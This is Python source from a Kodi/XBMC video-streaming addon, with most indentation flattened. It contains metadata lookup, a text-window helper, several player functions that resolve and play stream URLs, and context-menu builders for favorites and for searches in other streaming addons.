# #infoLabels={'rating': meta['rating'],'duration': meta['duration'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'writer': meta['writer'],'cover_url': meta['cover_url'],'director': meta['director'],'cast': meta['cast'],'backdrop_url': meta['backdrop_url'],'backdrop_url': meta['backdrop_url'],'tmdb_id': meta['tmdb_id'],'year': meta['year']}
# elif ('tvshow' in type):
# meta=grab.get_meta('tvshow',name,'','',None,overlay=6)
# #print meta
# infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status'],'premiered': meta['premiered'],'imdb_id': meta['imdb_id'],'tvdb_id': meta['tvdb_id'],'year': meta['year'],'imgs_prepacked': meta['imgs_prepacked'],'overlay': meta['overlay'],'duration': meta['duration']}
# #infoLabels={'rating': meta['rating'],'genre': meta['genre'],'mpaa':"rated %s"%meta['mpaa'],'plot': meta['plot'],'title': meta['title'],'cover_url': meta['cover_url'],'cast': meta['cast'],'studio': meta['studio'],'banner_url': meta['banner_url'],'backdrop_url': meta['backdrop_url'],'status': meta['status']}
# else: infoLabels={}
# else: infoLabels={}
# return infoLabels
def MetaGrab(media_type,meta_name,imdb_id='',tmdb_id='',year='',season='',episode=''):
default_infoLabels={'overlay':6,'title':meta_name,'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'trailer_url':'','trailer':'','TVShowTitle':meta_name,'backdrop_url':_artFanart,'banner_url':''}
try: from metahandler import metahandlers
except: debob("filed to import metahandler"); return default_infoLabels
grab=metahandlers.MetaData(preparezip=False)
try: EnableMeta=tfalse(addst("enableMeta"))
except: EnableMeta=True
if (EnableMeta==True):
if ('movie' in media_type) or (media_type=='m'):
infoLabels=grab.get_meta("movie",meta_name,imdb_id=imdb_id,tmdb_id=tmdb_id,year=year)
elif ('tvshow' in media_type) or (media_type=='t'):
infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
elif ('episode' in media_type) or (media_type=='e'):
if len(imdb_id)==0:
t_infoLabels=grab.get_meta("tvshow",meta_name,imdb_id=imdb_id)
imdb_id=t_infoLabels['imdb_id']
try:
iseason=int(season)
iepisode=int(episode)
				infoLabels=grab.get_episode_meta(tvshowtitle=meta_name,imdb_id=imdb_id,season=iseason,episode=iepisode)
except: infoLabels={'overlay':6,'title':str(season)+'x'+str(episode),'tvdb_id':'','imdb_id':'','cover_url':_artIcon,'poster':_artIcon,'TVShowTitle':meta_name}
else: infoLabels=default_infoLabels
#
else: infoLabels=default_infoLabels
return infoLabels
#
### ############################################################################################################
class TextBox2: ## Usage Example: TextBox2().load_url('https://raw.github.com/HIGHWAY99/plugin.video.theanimehighway/master/README.md')
WINDOW = 10147; CONTROL_LABEL = 1; CONTROL_TEXTBOX = 5; HEADER_MESSAGE = "%s - ( v%s )" % (__plugin__,addon.get_version()) # set heading
def load_url(self, URL_PATH, HEADER_MESSAGE2=''):
deb('text window from url: ',URL_PATH) #self.URL_PATH
try: text=nURL(URL_PATH)#(self.URL_PATH)
except: text=''
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_file(self, FILE_NAME='changelog.txt', HEADER_MESSAGE2='', FILE_PATH=_addonPath):
txt_path = os.path.join(FILE_PATH,FILE_NAME)
deb('text window from file: ',txt_path)
f = open(txt_path)
text = f.read()
self.load_window(); self.set_header(HEADER_MESSAGE2); self.set_text(text)
def load_string(self, text_string='', HEADER_MESSAGE2=''):
self.load_window(); xbmc.sleep(20); self.set_header(HEADER_MESSAGE2); self.set_text(text_string)
def load_window(self, sleeptime=500):
xbmc.executebuiltin("ActivateWindow(%d)" % ( self.WINDOW, )) # activate the text viewer window
self.win = xbmcgui.Window(self.WINDOW) # get window
xbmc.sleep(sleeptime) # give window time to initialize
def set_header(self, HEADER_MESSAGE2=''):
if (HEADER_MESSAGE2==''): HEADER_MESSAGE2=self.HEADER_MESSAGE
self.win.getControl(self.CONTROL_LABEL).setLabel(HEADER_MESSAGE2)
def set_text(self, text=''):
self.win.getControl(self.CONTROL_TEXTBOX).setText(text)
def RefreshList(): xbmc.executebuiltin("XBMC.Container.Refresh")
def String2TextBox(message='',HeaderMessage=''): TextBox2().load_string(message,HeaderMessage); #RefreshList()
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
##### Player Functions #####
def PlayItCustomL(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
#
html=nURL(stream_url); deb('Length of html',str(len(html)));
matches=re.compile('\n+\s*(.*?://.*)\s*\n+').findall(html)
#debob(matches)
if len(matches) > 0:
for match in matches:
#debob(match)
PL.add(match,listitem)
#
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomL2A(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(title,iconImage=img,thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); #PL.add(stream_url,listitem)
html=nURL(stream_url); deb('Length of html',str(len(html)));
html=html.replace('#EXT-X-STREAM-INF:PROGRAM-ID=','#EXT-X-STREAM-INF:NAME="'+title+'",PROGRAM-ID=')
PlaylistFile=xbmc.translatePath(os.path.join(_addonPath,'resources','playlist.txt')); debob(PlaylistFile)
_SaveFile(PlaylistFile,html)
PL.add(PlaylistFile,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustomMT(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
import proxy; axelhelper=proxy.ProxyHelper()
MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(MultiThread_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayItCustom(url,stream_url,img,title,studio=''):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
listitem=xbmcgui.ListItem(thumbnailImage=img); listitem.setInfo('video',{'Title':title,'Genre':'Live','Studio':studio})
PL=xbmc.PlayList(xbmc.PLAYLIST_VIDEO); PL.clear(); PL.add(stream_url,listitem)
try: _addon.resolve_url(url)
except: t=''
try: play=xbmc.Player(PlayerMeth); play.play(PL)
except: t=''
def PlayURL(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url,li)
except:
try: play.play(url)
except:
			if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode from watched list",wwT); visited_remove(wwT);
def PlayURL1(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(url)
except:
		if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode from watched list",wwT); visited_remove(wwT);
def PlayURLs(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
elif (uPre.lower()=='http'):
import urlresolver
try:
stream_url=urlresolver.HostedMediaFile(url).resolve()
play.play(stream_url)
except:
try: play.play(url)
except: pass
else:
try: play.play(url)
except: pass
#
def PlayURLs2(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
try: _addon.resolve_url(url)
except: pass
if ':' in url: uPre=url.split(':')[0]
else: uPre='____'
if (uPre.lower()=='mss') or (uPre.lower()=='mssh') or (uPre.lower()=='rtsp'):
_SaveFile(filename,url)
try: play.play(filename) #(url)
except: pass
else:
try: play.play(url)
except: pass
def PlayURLstrm(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
filename=xbmc.translatePath(os.path.join(_addonPath,'resources','test.strm'))
_SaveFile(filename,url)
try: _addon.resolve_url(url)
except: t=''
try: play.play(filename) #(url)
except: t=''
def PlayVideo(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
try: play.play(url, li)
except: t=''
def PlayFromHost(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
try:
if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
play.play(stream_url,li);
except:
		if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode from watched list",wwT); visited_remove(wwT);
t='';
def PlayFromHostMT(url):
PlayerMethod=addst("core-player")
if (PlayerMethod=='DVDPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_DVDPLAYER
elif (PlayerMethod=='MPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_MPLAYER
elif (PlayerMethod=='PAPLAYER'): PlayerMeth=xbmc.PLAYER_CORE_PAPLAYER
else: PlayerMeth=xbmc.PLAYER_CORE_AUTO
play=xbmc.Player(PlayerMeth) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
#play=xbmc.Player(xbmc.PLAYER_CORE_AUTO) ### xbmc.PLAYER_CORE_AUTO | xbmc.PLAYER_CORE_DVDPLAYER | xbmc.PLAYER_CORE_MPLAYER | xbmc.PLAYER_CORE_PAPLAYER
import urlresolver
infoLabels={"Studio":addpr('studio',''),"ShowTitle":addpr('showtitle',''),"Title":addpr('title','')}
li=xbmcgui.ListItem(addpr('title',''),iconImage=addpr('img',''),thumbnailImage=addpr('img',''))
li.setInfo(type="Video", infoLabels=infoLabels ); li.setProperty('IsPlayable', 'true')
deb('url',url)
###
#try: _addon.resolve_url(url)
#except: t=''
#stream_url='http://s6.vidcache.net/stream/a4133ca7743c0a0f4ff063f715d934472bb1d513?client_file_id=524368'
#play.play(stream_url, li)
###
if ('youtube.com' in url):
stream_url=url
else:
debob(urlresolver.HostedMediaFile(url))
#stream_url = urlresolver.HostedMediaFile(url).resolve()
try: stream_url = urlresolver.HostedMediaFile(url).resolve()
except: deb('Link URL Was Not Resolved',url); myNote("urlresolver.HostedMediaFile(url).resolve()","Failed to Resolve Playable URL."); return
try: debob(stream_url) #deb('stream_url',stream_url)
except: t=''
#xbmc.Player().stop()
try: _addon.resolve_url(url)
except: t=''
wwT=addpr("wwT"); wwB=tfalse(addpr("MarkAsWatched","false"));
deb("MarkAsWatched",str(wwB));
#from axel.downloader import proxy;
import proxy;
axelhelper=proxy.ProxyHelper()
axelhelper.playUrl(stream_url);
#print axelhelper.download(urlhere);
#MultiThread_url=axelhelper.create_proxy_url(stream_url)
###
#play.play(MultiThread_url,li);
return
	# NOTE: the block below is unreachable (the function returns above); kept commented out for reference.
	#try:
	#	if (wwB==True) and (len(wwT) > 0): deb("Attempting to add episode to watched list",wwT); visited_add(wwT);
	#	#play.play(stream_url,li);
	#	play.play(MultiThread_url,li);   # MultiThread_url is never defined (its assignment above is commented out)
	#except:
	#	if (wwB==True) and (len(wwT) > 0): deb("Attempting to remove episode from watched list",wwT); visited_remove(wwT);
	#	t='';
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
years=re.compile(' \((\d+)\)').findall('__'+name+'__')
for year in years:
name=name.replace(' ('+year+')','')
name=name.strip()
return name
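# Illustrative usage: strips a trailing ' (year)' from a display title:
#   filename_filter_out_year('Some Show (2012)')  -->  'Some Show'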
def QP(v): return urllib.quote_plus(v)
def DoLabs2LB(labs,subfav=''):
	LB={}
	for n in ['title','year','img','fanart','plot','url','country','genres','todoparams','commonid','commonid2']:
		try: LB[n]=str(labs[n])
		except: LB[n]=''
	for n in ['site','section']:
		try: LB[n]=labs[n]
		except:
			try: LB[n]=addpr(n,'')
			except: LB[n]=''
	##try: LB['subfav']=subfav
	##except: LB['subfav']=''
	#n=''
	#try: LB[n]=labs[n]
	#except: LB[n]=''
	return LB
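# Illustrative usage (keys are the ones DoLabs2LB knows about): normalize item labels
# into a flat dict that is safe to feed to _addon.build_plugin_url():
#   LB=DoLabs2LB({'title':'Some Show','year':2012}); LB['mode']='cFavoritesAdd'
#   Pars='XBMC.RunPlugin(%s)' % _addon.build_plugin_url(LB)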
def ContextMenu_Favorites(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
try: _subfav=addpr('subfav','')
except: _subfav=''
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
try:
if _subfav=='': _sf='1'
else: _sf=_subfav
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
#if _sf is not '1': LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
#if _sf is not '2': LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
#if _sf is not '3': LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
#if _sf is not '4': LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
#if _sf is not '5': LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
#if _sf is not '6': LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
#if _sf is not '7': LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
LB['mode']='cFavoritesRemove'; LB['subfav']=_subfav; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append(('Remove',Pars)) #'Remove: '+WRFC+addst('fav.tv.'+_sf+'.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Movies(labs={}):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Movie Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','movies',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','movies',nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb'): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','movies',urllib.quote_plus('http://merdb.ru/'),nameonly)))
#if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms'): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', title, '1')))
try:
WRFC=ps('WhatRFavsCalled')
LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.1.name'),Pars))
LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.2.name'),Pars))
#LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.3.name'),Pars))
#LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.4.name'),Pars))
#LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.5.name'),Pars))
#LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.6.name'),Pars))
#LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.7.name'),Pars))
except: pass
return contextMenuItems
def ContextMenu_Series(labs={},TyP='tv'):
contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
try: site=labs['site']
except: site=addpr('site','')
try: section=labs['section']
except: section=addpr('section','')
if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Show Info',ps('cMI.showinfo.url')))
if labs=={}: return contextMenuItems
if (tfalse(addst("CMI_FindAirDates"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Find AirDates', 'XBMC.Container.Update(%s?mode=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','SearchForAirDates',labs['title'])))
if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','tv',nameonly)))
if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','tv',nameonly)))
if (tfalse(addst("CMI_SearchMerDBru"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb')): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','tvshows',urllib.quote_plus('http://merdb.ru/tvshow/'),nameonly)))
if (tfalse(addst("CMI_SearchIceFilms"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms')): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', labs['title'], '1')))
try:
WRFC=ps('WhatRFavsCalled'); WRFCr='Remove: '
LB=DoLabs2LB(labs); McFA='cFavoritesAdd'; McFR='cFavoritesRemove'; LB['mode']=McFA; P1='XBMC.RunPlugin(%s)'
